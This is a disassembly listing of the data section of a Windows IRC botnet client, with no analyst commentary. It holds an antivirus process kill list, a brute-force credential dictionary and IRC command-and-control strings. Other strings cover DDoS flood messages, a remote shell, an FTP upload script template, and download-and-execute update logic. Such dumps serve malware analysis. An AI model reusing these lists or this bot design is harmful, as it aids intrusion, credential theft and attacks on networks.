aAgentw_exe db 'AGENTW.EXE',0 ; DATA XREF: .data:0042A468�o
align 4
aAgentsvr_exe db 'AGENTSVR.EXE',0 ; DATA XREF: .data:0042A464�o
align 4
aAdvxdwin_exe db 'ADVXDWIN.EXE',0 ; DATA XREF: .data:0042A460�o
align 4
aAdaware_exe db 'ADAWARE.EXE',0 ; DATA XREF: .data:0042A45C�o
aAckwin32_exe db 'ACKWIN32.EXE',0 ; DATA XREF: .data:off_42A458�o
align 4
aCannotExtractP db 'Cannot extract process path for %s',0Ah,0 ; DATA XREF: sub_4070E8+2D7�o
aFileDeletedS_ db '[FILE]: Deleted ',27h,'%s',27h,'.',0Ah,0 ; DATA XREF: sub_4070E8+2C9�o
align 10h
aCouldNotDelete db 'Could not delete ',27h,'%s',27h,'.!',0Ah,0 ; DATA XREF: sub_4070E8+2BB�o
align 4
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_4070E8+187�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_4070E8+5A�o
; sub_4070E8+205�o
align 4
aProcProcessL_0 db '[PROC]: Process list failed.',0 ; DATA XREF: sub_4073FB:loc_40747C�o
align 4
aProcProcessLis db '[PROC]: Process list completed.',0 ; DATA XREF: sub_4073FB+7A�o
aProcListingPro db '[PROC]: Listing processes:',0 ; DATA XREF: sub_4073FB+2A�o
align 4
aIntranet db 'intranet',0 ; DATA XREF: .data:0042B26C�o
align 4
aLan db 'lan',0 ; DATA XREF: .data:0042B264�o
aMain db 'main',0 ; DATA XREF: .data:0042B260�o
align 10h
aWinpass db 'winpass',0 ; DATA XREF: .data:0042B25C�o
aBlank db 'blank',0 ; DATA XREF: .data:0042B258�o
align 10h
aOffice db 'office',0 ; DATA XREF: .data:0042B254�o
align 4
aControl db 'control',0 ; DATA XREF: .data:0042B250�o
aXp db 'xp',0 ; DATA XREF: .data:0042B24C�o
align 4
aNokia db 'nokia',0 ; DATA XREF: .data:0042B248�o
align 4
aHp db 'hp',0 ; DATA XREF: .data:0042B244�o
align 10h
aSiemens db 'siemens',0 ; DATA XREF: .data:0042B240�o
aCompaq db 'compaq',0 ; DATA XREF: .data:0042B23C�o
align 10h
aDell db 'dell',0 ; DATA XREF: .data:0042B238�o
align 4
aCisco db 'cisco',0 ; DATA XREF: .data:0042B234�o
align 10h
aIbm db 'ibm',0 ; DATA XREF: .data:0042B230�o
aOrainstall db 'orainstall',0 ; DATA XREF: .data:0042B228�o
align 10h
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .data:0042B224�o
align 4
aSql db 'sql',0 ; DATA XREF: .data:0042B220�o
aSa db 'sa',0 ; DATA XREF: sub_4078FA+1862�o
; .text:004127DB�o ...
align 4
aDb1234 db 'db1234',0 ; DATA XREF: .data:0042B218�o
align 4
aDb1 db 'db1',0 ; DATA XREF: .data:0042B210�o
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .data:0042B20C�o
align 4
aData db 'data',0 ; DATA XREF: .data:0042B208�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: .data:0042B204�o
align 4
aDbpassword db 'dbpassword',0 ; DATA XREF: .data:0042B200�o
align 10h
aDbpass db 'dbpass',0 ; DATA XREF: .data:0042B1FC�o
align 4
aAccess db 'access',0 ; DATA XREF: .data:0042B1F8�o
align 10h
aDomainpassword db 'domainpassword',0 ; DATA XREF: .data:0042B1F0�o
align 10h
aDomainpass db 'domainpass',0 ; DATA XREF: .data:0042B1EC�o
align 4
aDomain db 'domain',0 ; DATA XREF: .data:0042B1E8�o
align 4
aHello db 'hello',0 ; DATA XREF: .data:0042B1E4�o
align 4
aHell_0 db 'hell',0 ; DATA XREF: .data:0042B1E0�o
align 4
aGod db 'god',0 ; DATA XREF: .data:0042B1DC�o
aSex db 'sex',0 ; DATA XREF: .data:0042B1D8�o
aSlut db 'slut',0 ; DATA XREF: .data:0042B1D4�o
align 4
aBitch db 'bitch',0 ; DATA XREF: .data:0042B1D0�o
align 4
aFuck db 'fuck',0 ; DATA XREF: .data:0042B1CC�o
align 4
aExchange db 'exchange',0 ; DATA XREF: .data:0042B1C8�o
align 10h
aBackup db 'backup',0 ; DATA XREF: .data:0042B1C4�o
align 4
aTechnical db 'technical',0 ; DATA XREF: .data:0042B1C0�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: .data:0042B1BC�o
align 10h
aLogin db 'login',0 ; DATA XREF: sub_4078FA+7BE�o
; .data:0042B1B8�o
align 4
aMary db 'mary',0 ; DATA XREF: .data:0042B1B4�o
align 10h
aKatie db 'katie',0 ; DATA XREF: .data:0042B1B0�o
align 4
aKate db 'kate',0 ; DATA XREF: .data:0042B1A8�o
align 10h
aGeorge db 'george',0 ; DATA XREF: .data:0042B1A4�o
align 4
aEric db 'eric',0 ; DATA XREF: .data:0042B1A0�o
align 10h
aChris db 'chris',0 ; DATA XREF: .data:0042B19C�o
align 4
aIan db 'ian',0 ; DATA XREF: .data:0042B198�o
aNeil db 'neil',0 ; DATA XREF: .data:0042B194�o
align 4
aLee db 'lee',0 ; DATA XREF: .data:0042B190�o
aBrian db 'brian',0 ; DATA XREF: .data:0042B18C�o
align 10h
aSusan db 'susan',0 ; DATA XREF: .data:0042B184�o
align 4
aSue db 'sue',0 ; DATA XREF: .data:0042B180�o
aSam db 'sam',0 ; DATA XREF: .data:0042B17C�o
aLuke db 'luke',0 ; DATA XREF: .data:0042B178�o
align 4
aPeter db 'peter',0 ; DATA XREF: .data:0042B174�o
; .data:0042B188�o
align 10h
aJohn db 'john',0 ; DATA XREF: .data:0042B170�o
align 4
aMike db 'mike',0 ; DATA XREF: .data:0042B16C�o
align 10h
aBill db 'bill',0 ; DATA XREF: .data:0042B168�o
align 4
aFred db 'fred',0 ; DATA XREF: .data:0042B164�o
align 10h
aJoe db 'joe',0 ; DATA XREF: .data:0042B160�o
aJen db 'jen',0 ; DATA XREF: .data:0042B15C�o
aBob db 'bob',0 ; DATA XREF: .data:0042B158�o
; .data:0042B1AC�o
aQwe db 'qwe',0 ; DATA XREF: .data:0042B154�o
aZxc db 'zxc',0 ; DATA XREF: .data:0042B150�o
aAsd db 'asd',0 ; DATA XREF: .data:0042B14C�o
aQaz db 'qaz',0 ; DATA XREF: .data:0042B148�o
aWin2000 db 'win2000',0 ; DATA XREF: .data:0042B144�o
aWinnt db 'winnt',0 ; DATA XREF: .data:0042B140�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: .data:0042B13C�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .data:0042B138�o
align 4
aWin98 db 'win98',0 ; DATA XREF: .data:0042B134�o
align 4
aWindows db 'windows',0 ; DATA XREF: .data:0042B130�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .data:0042B12C�o
align 4
aOemuser db 'oemuser',0 ; DATA XREF: .data:0042B128�o
aOem db 'oem',0 ; DATA XREF: .data:0042B124�o
aUser db 'user',0 ; DATA XREF: sub_4078FA+1D2D�o
; .data:0042B120�o
align 4
aHomeuser db 'homeuser',0 ; DATA XREF: .data:0042B11C�o
align 4
aHome db 'home',0 ; DATA XREF: .data:0042B118�o
align 10h
aAccounting db 'accounting',0 ; DATA XREF: .data:0042B114�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .data:0042B110�o
align 4
aInternet db 'internet',0 ; DATA XREF: .data:0042B10C�o
; .data:0042B268�o
align 4
aWww db 'www',0 ; DATA XREF: .data:0042B108�o
aWeb db 'web',0 ; DATA XREF: .data:0042B104�o
aOutlook db 'outlook',0 ; DATA XREF: .data:0042B100�o
aMail db 'mail',0 ; DATA XREF: .data:0042B0FC�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .data:0042B0F8�o
align 4
aNull_0 db 'null',0 ; DATA XREF: .data:0042B0F4�o
align 4
aServer db 'server',0 ; DATA XREF: sub_4078FA+19F0�o
; .data:0042B0EC�o
align 4
aSystem db 'system',0 ; DATA XREF: .data:0042B0E8�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: .data:0042B0E0�o
align 4
aLinux db 'linux',0 ; DATA XREF: .data:0042B0DC�o
align 10h
aUnix db 'unix',0 ; DATA XREF: .data:0042B0D8�o
align 4
aDemo db 'demo',0 ; DATA XREF: .data:0042B0D4�o
align 10h
aNone db 'none',0 ; DATA XREF: .data:0042B0D0�o
align 4
aTest db 'test',0 ; DATA XREF: .data:0042B0C8�o
align 10h
a2004 db '2004',0 ; DATA XREF: .data:0042B0C4�o
align 4
a2003 db '2003',0 ; DATA XREF: sub_40FE1F+98�o
; .data:0042B0C0�o
align 10h
a2002 db '2002',0 ; DATA XREF: .data:0042B0BC�o
align 4
a2001 db '2001',0 ; DATA XREF: .data:0042B0B8�o
align 10h
a2000 db '2000',0 ; DATA XREF: .data:0042B0B4�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: .data:0042B0B0�o
align 4
a123456789 db '123456789',0 ; DATA XREF: .data:0042B0AC�o
align 10h
a12345678 db '12345678',0 ; DATA XREF: .data:0042B0A8�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .data:0042B0A4�o
a123456 db '123456',0 ; DATA XREF: .data:0042B0A0�o
align 4
a12345 db '12345',0 ; DATA XREF: .data:0042B09C�o
align 4
a1234 db '1234',0 ; DATA XREF: .data:0042B098�o
align 4
a123 db '123',0 ; DATA XREF: .data:0042B094�o
a12 db '12',0 ; DATA XREF: .data:0042B090�o
align 4
a1: ; DATA XREF: .data:0042B08C�o
unicode 0, <1>,0
a007 db '007',0 ; DATA XREF: .data:0042B088�o
aPwd db 'pwd',0 ; DATA XREF: .data:0042B084�o
aPass_0 db 'pass',0 ; DATA XREF: .data:0042B080�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: .data:0042B07C�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .data:0042B078�o
align 4
aPassword db 'password',0 ; DATA XREF: .data:0042B074�o
align 4
aPassword1 db 'password1',0 ; DATA XREF: .data:0042B070�o
align 4
aAdm db 'adm',0 ; DATA XREF: .data:0042B06C�o
aDb2 db 'db2',0 ; DATA XREF: .data:0042B048�o
; .data:0042B214�o
aOracle db 'oracle',0 ; DATA XREF: .data:0042B044�o
; .data:0042B22C�o
align 4
aDba db 'dba',0 ; DATA XREF: .data:0042B040�o
aDatabase db 'database',0 ; DATA XREF: .data:0042B03C�o
; .data:0042B1F4�o
align 4
aDefault db 'default',0 ; DATA XREF: .data:0042B038�o
; .data:0042B0E4�o
aGuest_0 db 'guest',0 ; DATA XREF: .data:0042B034�o
; .data:0042B0CC�o
align 4
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .data:0042B030�o
align 10h
aTeacher db 'teacher',0 ; DATA XREF: .data:0042B02C�o
; .data:0042B274�o
aStudent db 'student',0 ; DATA XREF: .data:0042B028�o
; .data:0042B270�o
aOwner db 'owner',0 ; DATA XREF: .data:0042B024�o
align 4
aComputer db 'computer',0 ; DATA XREF: .data:0042B020�o
align 4
aRoot db 'root',0 ; DATA XREF: .text:004127E2�o
; .data:0042B01C�o ...
align 4
aStaff db 'staff',0 ; DATA XREF: .data:0042B018�o
; .data:0042B278�o
align 4
aAdmin db 'admin',0 ; DATA XREF: .text:004127E9�o
; .data:0042B014�o ...
align 4
aAdmins db 'admins',0 ; DATA XREF: .data:0042B010�o
; .data:0042B064�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .data:0042B00C�o
; .data:0042B060�o
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:0042B008�o
; .data:0042B05C�o
align 10h
aAdministrador db 'administrador',0 ; DATA XREF: .data:0042B004�o
; .data:0042B058�o
align 10h
aAdministrato_0 db 'administrator',0 ; DATA XREF: .data:0042B000�o
; .data:0042B054�o
align 10h
aMircV6_12Khale db 'mIRC v6.12 Khaled Mardam-Bey',0 ; DATA XREF: .data:off_42AF40�o
align 10h
a@celestial_org db '*@celestial.org',0 ; DATA XREF: .data:off_42AF3C�o
asc_4246B0: ; DATA XREF: sub_40751F+129�o
; sub_40751F+1AD�o
unicode 0, <|>,0
asc_4246B4 db ' :',0 ; DATA XREF: sub_40751F:loc_4075FF�o
; sub_4078FA+80�o ...
align 4
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_40751F+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_40751F+38�o
align 10h
aMainConnectedT db '[MAIN]: Connected to %s.',0 ; DATA XREF: sub_40779B+9F�o
align 4
aModeSS db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_4078FA+58C5�o
align 4
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_4078FA+58B0�o
align 4
aMainUserSLog_1 db '[MAIN]: User: %s logged in.',0 ; DATA XREF: sub_4078FA+589C�o
aMainPasswordAc db '[MAIN]: Password accepted.',0 ; DATA XREF: sub_4078FA+587F�o
align 4
aMainFailedHost db '[MAIN]: *Failed host auth by: (%s!%s).',0 ; DATA XREF: sub_4078FA+5807�o
align 4
aNoticeSHostAut db 'NOTICE %s :Host Auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_4078FA+57E4�o
align 4
aMainFailedPass db '[MAIN]: *Failed pass auth by: (%s!%s).',0 ; DATA XREF: sub_4078FA+57A0�o
align 4
aNoticeSYourAtt db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_4078FA+5791�o
; sub_4078FA+57F8�o
align 4
aNoticeSPassAut db 'NOTICE %s :Pass auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_4078FA+577D�o
align 10h
asc_424820: ; DATA XREF: sub_4078FA+572B�o
unicode 0, <~>,0
dword_424824 dd 0 aMainRandomNick db '[MAIN]: Random nick change: %s',0 ; DATA XREF: sub_4078FA+56DB�o
align 4
aScanFailedTo_2 db '[SCAN]: Failed to start scan, no IP specified.',0
; DATA XREF: sub_4078FA+548B�o
align 4
aStoppingPrevio db 'Stopping previous scans',0 ; DATA XREF: sub_4078FA+5450�o
aUdpFailedToSta db '[UDP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_4078FA+5231�o
align 8
aUdpSendingDPac db '[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).'
; DATA XREF: sub_4078FA+51CC�o
db 0
align 4
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_4078FA+50F9�o
align 4
aPingFailedToSt db '[PING]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_4078FA+50D2�o
align 4
aPingSendingDPi db '[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).'
; DATA XREF: sub_4078FA+5077�o
db 0
align 4
aTcpInvalidFl_0 db '[TCP]: Invalid flood time must be greater than 0.',0
; DATA XREF: sub_4078FA:loc_40C8AD�o
align 10h
aTcpFailedToSta db '[TCP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_4078FA+4F97�o
align 4
aTcpSSFloodingS db '[TCP]: %s %s flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_4078FA+4F33�o
align 4
aNormal db 'Normal',0 ; DATA XREF: sub_4078FA+4F21�o
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_4078FA+4F1A�o
aTcpInvalidFloo db '[TCP]: Invalid flood type specified.',0 ; DATA XREF: sub_4078FA+4E21�o
align 4
aRandom_0 db 'random',0 ; DATA XREF: sub_4078FA+4E15�o
; sub_41046C+35D�o
align 4
aAck db 'ack',0 ; DATA XREF: sub_4078FA+4E01�o
; sub_41046C+331�o
aSyn_0 db 'syn',0 ; DATA XREF: sub_4078FA+4DED�o
; sub_41046C+30F�o
aFtpUploading_0 db '[FTP]: Uploading file: %s to: %s failed.',0
; DATA XREF: sub_4078FA:loc_40C621�o
align 4
aFtpUploadingFi db '[FTP]: Uploading file: %s to: %s',0 ; DATA XREF: sub_4078FA+4D20�o
align 4
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_4078FA+4D09�o
aSS_3 db '-s:%s',0 ; DATA XREF: sub_4078FA+4CF0�o
align 4
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_4078FA+4CD0�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 10h
aAb db 'ab',0 ; DATA XREF: sub_4078FA+4C9D�o
align 4
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_4078FA+4C8C�o
align 4
aFtpFileNotFoun db '[FTP]: File not found: %s.',0 ; DATA XREF: sub_4078FA+4C33�o
align 10h
aUpload db 'upload',0 ; DATA XREF: sub_4078FA+4C0D�o
align 4
aHcon db 'hcon',0 ; DATA XREF: sub_4078FA+4BEC�o
align 10h
aHttpcon db 'httpcon',0 ; DATA XREF: sub_4078FA+4BD8�o
aMainInvalidLog db '[MAIN]: Invalid login slot number: %d.',0 ; DATA XREF: sub_4078FA+4B12�o
align 10h
aMainNoUserLogg db '[MAIN]: No user logged in at slot: %d.',0 ; DATA XREF: sub_4078FA+4B0A�o
align 4
aMainS db '[MAIN]: %s',0 ; DATA XREF: sub_4078FA+4AAE�o
align 4
aSecureFailedTo db '[SECURE]: Failed to start secure thread, error: <%d>.',0
; DATA XREF: sub_4078FA+4A7B�o
; sub_40D1EF+3DE�o
align 4
aSecureSSystem_ db '[SECURE]: %s system.',0 ; DATA XREF: sub_4078FA+4A11�o
align 4
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_4078FA+4A0B�o
align 10h
aSecuring db 'Securing',0 ; DATA XREF: sub_4078FA+4A04�o
align 4
aSocks4FailedTo db '[SOCKS4]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_4078FA+4976�o
align 4
aSocks4ServerSt db '[SOCKS4]: Server started on: %s:%d.',0 ; DATA XREF: sub_4078FA+491D�o
; sub_40FB2A+A1�o
aProc db '[PROC]',0 ; DATA XREF: sub_4078FA+484F�o
align 10h
aProcessList db 'Process list',0 ; DATA XREF: sub_4078FA+484A�o
align 10h
aMainReconnecti db '[MAIN]: Reconnecting.',0 ; DATA XREF: sub_4078FA+4814�o
align 4
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_4078FA:loc_40C101�o
align 10h
aMainDisconnect db '[MAIN]: Disconnecting.',0 ; DATA XREF: sub_4078FA+47F2�o
align 4
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_4078FA:loc_40C0DF�o
align 10h
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_4078FA+47BC�o
align 4
aMainStatusRead db '[MAIN]: Status: Ready. Bot Uptime: %s.',0 ; DATA XREF: sub_4078FA+476E�o
align 4
aMainBotIdS_ db '[MAIN]: Bot ID: %s.',0 ; DATA XREF: sub_4078FA+472F�o
aThreadsFaile_0 db '[THREADS]: Failed to start list thread, error: <%d>.',0
; DATA XREF: sub_4078FA+46FC�o
align 10h
aThreadsListThr db '[THREADS]: List threads.',0 ; DATA XREF: sub_4078FA+469B�o
align 4
aSub db 'sub',0 ; DATA XREF: sub_4078FA+4679�o
aMainAliasList_ db '[MAIN]: Alias list.',0 ; DATA XREF: sub_4078FA+4623�o
aLogFailedToSta db '[LOG]: Failed to start listing thread, error: <%d>.',0
; DATA XREF: sub_4078FA+45F3�o
aLogListingLog_ db '[LOG]: Listing log.',0 ; DATA XREF: sub_4078FA+4598�o
aMainNetworkInf db '[MAIN]: Network Info.',0 ; DATA XREF: sub_4078FA+44F1�o
align 4
aMainSystemInfo db '[MAIN]: System Info.',0 ; DATA XREF: sub_4078FA+44C1�o
align 4
aMainRemovingBo db '[MAIN]: Removing Bot.',0 ; DATA XREF: sub_4078FA+446D�o
align 4
aProcsFailedToS db '[PROCS]: Failed to start listing thread, error: <%d>.',0
; DATA XREF: sub_4078FA+43F7�o
align 4
aProcsProccessL db '[PROCS]: Proccess list.',0 ; DATA XREF: sub_4078FA+4396�o
aFull db 'full',0 ; DATA XREF: sub_4078FA+437A�o
align 4
aProcAlreadyRun db '[PROC]: Already running.',0 ; DATA XREF: sub_4078FA+4314�o
align 4
aMainUptimeS_ db '[MAIN]: Uptime: %s.',0 ; DATA XREF: sub_4078FA+42C0�o
aCmdRemoteShe_0 db '[CMD]: Remote shell ready.',0 ; DATA XREF: sub_4078FA:loc_40BB2C�o
align 4
aCmdCouldnTOpen db '[CMD]: Couldn',27h,'t open remote shell.',0
; DATA XREF: sub_4078FA+4228�o
align 4
aCmdRemoteShell db '[CMD]: Remote shell already running.',0 ; DATA XREF: sub_4078FA+4209�o
align 4
aMainGetClipboa db '[MAIN]: Get Clipboard.',0 ; DATA XREF: sub_4078FA+41F3�o
align 4
aClipboardData db '-[Clipboard Data]-',0 ; DATA XREF: sub_4078FA+41C4�o
align 10h
aFlushdnsFail_1 db '[FLUSHDNS]: Failed to flush ARP cache.',0
; DATA XREF: sub_4078FA:loc_40BAAC�o
align 4
aFlushdnsArpC_0 db '[FLUSHDNS]: ARP cache flushed.',0 ; DATA XREF: sub_4078FA+419D�o
align 4
aFlushdnsFail_0 db '[FLUSHDNS]: Failed to load dnsapi.dll.',0
; DATA XREF: sub_4078FA:loc_40BA7B�o
align 10h
aFlushdnsFailed db '[FLUSHDNS]: Failed to flush DNS cache.',0
; DATA XREF: sub_4078FA:loc_40BA74�o
align 4
aFlushdnsDnsCac db '[FLUSHDNS]: DNS cache flushed.',0 ; DATA XREF: sub_4078FA+4173�o
align 4
aRlogindFailedT db '[RLOGIND]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_4078FA+4105�o
align 10h
aRlogindServerL db '[RLOGIND]: Server listening on IP: %s:%d, Username: %s.',0
; DATA XREF: sub_4078FA+40AC�o
aHttpdFailedT_1 db '[HTTPD]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_4078FA+3FCC�o
align 10h
aTftpFailedTo_0 db '[TFTP]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_4078FA+3E3C�o
aTftpAlreadyRun db '[TFTP]: Already running.',0 ; DATA XREF: sub_4078FA+3D1F�o
align 10h
aScanFailedTo_1 db '[SCAN]: Failed to start scan, port is invalid.',0
; DATA XREF: sub_4078FA+3D01�o
; sub_4078FA+53CF�o
align 10h
aScanSPortScanS db '[SCAN]: %s Port Scan started on %s:%d with a delay of %d seconds '
; DATA XREF: sub_4078FA+3C39�o
; sub_4078FA+5614�o
db 'for %d minutes using %d threads.',0
align 4
aSequential db 'Sequential',0 ; DATA XREF: sub_4078FA+3C0E�o
; sub_4078FA+55E9�o
align 10h
aRandom db 'Random',0 ; DATA XREF: sub_4078FA+3C07�o
; sub_4078FA+55E2�o
align 4
aScanAlreadyDSc db '[SCAN]: Already %d scanning threads. Too many specified.',0
; DATA XREF: sub_4078FA+3A2A�o
; sub_4078FA+5297�o
align 4
aMainNickChange db '[MAIN]: Nick changed to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_4078FA+39C6�o
align 4
aMainJoinedCh_0 db '[MAIN]: Joined channel: ',27h,'%s',27h,'.',0
; DATA XREF: sub_4078FA+39A9�o
align 4
aMainPartedChan db '[MAIN]: Parted channel: ',27h,'%s',27h,'.',0
; DATA XREF: sub_4078FA+3988�o
align 4
aMainIrcRawS_ db '[MAIN]: IRC Raw: %s.',0 ; DATA XREF: sub_4078FA+396E�o
align 4
aThreadsFailedT db '[THREADS]: Failed to kill thread: %s.',0
; DATA XREF: sub_4078FA:loc_40B1EF�o
align 4
aThreadsKilledT db '[THREADS]: Killed thread: %s.',0 ; DATA XREF: sub_4078FA+38EE�o
align 4
aThreadsNoActiv db '[THREADS]: No active threads found.',0
; DATA XREF: sub_4078FA:loc_40B1A3�o
aThreadsStopped db '[THREADS]: Stopped: %d thread(s).',0 ; DATA XREF: sub_4078FA+389F�o
align 4
aAll db 'all',0 ; DATA XREF: sub_4078FA+3889�o
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_4078FA+37FC�o
; sub_4078FA:loc_40C0C8�o
align 10h
aMainPrefixChan db '[MAIN]: Prefix changed to: ',27h,'%c',27h,'.',0
; DATA XREF: sub_4078FA+377B�o
align 4
aShellCouldnTOp db '[SHELL]: Couldn',27h,'t open file: %s',0
; DATA XREF: sub_4078FA:loc_40B05C�o
aShellFileOpene db '[SHELL]: File opened: %s',0 ; DATA XREF: sub_4078FA+3758�o
align 10h
aMainServerChan db '[MAIN]: Server changed to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_4078FA+3723�o
align 4
aDnsCouldnTReso db '[DNS]: Couldn',27h,'t resolve hostname.',0 ; DATA XREF: sub_4078FA+36FB�o
align 4
aDnsLookupSS_ db '[DNS]: Lookup: %s -> %s.',0 ; DATA XREF: sub_4078FA+36E5�o
align 4
aProcFailedTo_0 db '[PROC]: Failed to terminate process: %s',0
; DATA XREF: sub_4078FA:loc_40AF90�o
aProcProcessK_1 db '[PROC]: Process killed: %s',0 ; DATA XREF: sub_4078FA+368F�o
align 4
aProcProcessK_0 db '[PROC]: Process killed & deleted: %s',0 ; DATA XREF: sub_4078FA+3647�o
align 10h
aProcFailedToTe db '[PROC]: Failed to terminate process ID: %s',0
; DATA XREF: sub_4078FA:loc_40AEE2�o
align 4
aProcProcessKil db '[PROC]: Process killed ID: %s',0 ; DATA XREF: sub_4078FA+35E1�o
align 4
aFileDeletedS_0 db '[FILE]: Deleted ',27h,'%s',27h,'.',0 ; DATA XREF: sub_4078FA+358A�o
align 4
aFileListS db '[FILE]: List: %s',0 ; DATA XREF: sub_4078FA+3565�o
align 4
aMircCommandSen db '[mIRC]: Command sent.',0 ; DATA XREF: sub_4078FA:loc_40AE07�o
align 10h
aMircClientNotO db '[mIRC]: Client not open.',0 ; DATA XREF: sub_4078FA+3506�o
align 4
aCmdCommandsS db '[CMD]: Commands: %s',0 ; DATA XREF: sub_4078FA+34C6�o
aCmdErrorSendin db '[CMD]: Error sending to remote shell.',0 ; DATA XREF: sub_4078FA+34BE�o
align 4
aMainReadFileFa db '[MAIN]: Read file failed: %s',0 ; DATA XREF: sub_4078FA+3467�o
align 4
aMainReadFileCo db '[MAIN]: Read file complete: %s',0 ; DATA XREF: sub_4078FA+3451�o
align 4
aMainGethostS_ db '[MAIN]: Gethost: %s.',0 ; DATA XREF: sub_4078FA+33CE�o
align 10h
aMainUnableToEx db '[MAIN]: Unable to extract Gethost command.',0
; DATA XREF: sub_4078FA:loc_40AC84�o
align 4
aMainGethostSCo db '[MAIN]: Gethost: %s, Command: %s',0 ; DATA XREF: sub_4078FA+3374�o
align 10h
aMainAliasAdded db '[MAIN]: Alias added: %s.',0 ; DATA XREF: sub_4078FA+32BF�o
align 4
aMainPrivmsgSS_ db '[MAIN]: Privmsg: %s: %s.',0 ; DATA XREF: sub_4078FA+327C�o
align 4
aMainActionSS_ db '[MAIN]: Action: %s: %s.',0 ; DATA XREF: sub_4078FA+3211�o
aMainCycle_ db '[MAIN]: Cycle.',0 ; DATA XREF: sub_4078FA+3191�o
align 10h
aPartS db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_4078FA+3155�o
; sub_4078FA+3978�o
align 4
aMainModeChange db '[MAIN]: Mode change: %s',0 ; DATA XREF: sub_4078FA+3130�o
aModeS_0 db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_4078FA+3122�o
align 10h
aCloneRawSS db '[CLONE]: Raw (%s): %s',0 ; DATA XREF: sub_4078FA+30F6�o
align 4
aCloneModeSS db '[CLONE]: Mode (%s): %s',0 ; DATA XREF: sub_4078FA+3087�o
align 10h
aModeS db 'MODE %s',0 ; DATA XREF: sub_4078FA+302F�o
aCloneNickSS db '[CLONE]: Nick (%s): %s',0 ; DATA XREF: sub_4078FA+2FFC�o
align 10h
aNickS db 'NICK %s',0 ; DATA XREF: sub_4078FA+2FA3�o
; sub_4078FA+37C3�o
aJoinSS db 'JOIN %s %s',0 ; DATA XREF: sub_4078FA+2F82�o
align 4
aS_4 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_4078FA+2F4E�o
; sub_4078FA+2FDB�o ...
align 4
aPartS_0 db 'PART %s',0 ; DATA XREF: sub_4078FA+2F15�o
aMainRepeatNotA db '[MAIN]: Repeat not allowed in command line: %s',0
; DATA XREF: sub_4078FA:loc_40A7FC�o
align 4
aMainRepeatS db '[MAIN]: Repeat: %s',0 ; DATA XREF: sub_4078FA+2EC7�o
align 4
aMainDelay_ db '[MAIN]: Delay.',0 ; DATA XREF: sub_4078FA:loc_40A72E�o
align 4
aSSSS db '%s %s %s :%s',0 ; DATA XREF: sub_4078FA+2DF0�o
; sub_4078FA+2EA1�o ...
align 4
aUpdateUpToDate db '[UPDATE]: Up to Date',0 ; DATA XREF: sub_4078FA+2D7C�o
align 10h
aUpdateFailedTo db '[UPDATE]: Failed to start download thread, error: <%d>.',0
; DATA XREF: sub_4078FA+2D54�o
aUpdateDownload db '[UPDATE]: Downloading update from: %s.',0 ; DATA XREF: sub_4078FA+2CF5�o
align 10h
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_4078FA+2C4E�o
align 4
aExecCommandsS db '[EXEC]: Commands: %s',0 ; DATA XREF: sub_4078FA+2BCA�o
align 4
aExecCouldnTExe db '[EXEC]: Couldn',27h,'t execute file.',0 ; DATA XREF: sub_4078FA+2BB7�o
align 4
aFile db '[FILE]:',0 ; DATA XREF: sub_4078FA:loc_40A407�o
; sub_4078FA:loc_40AE8B�o
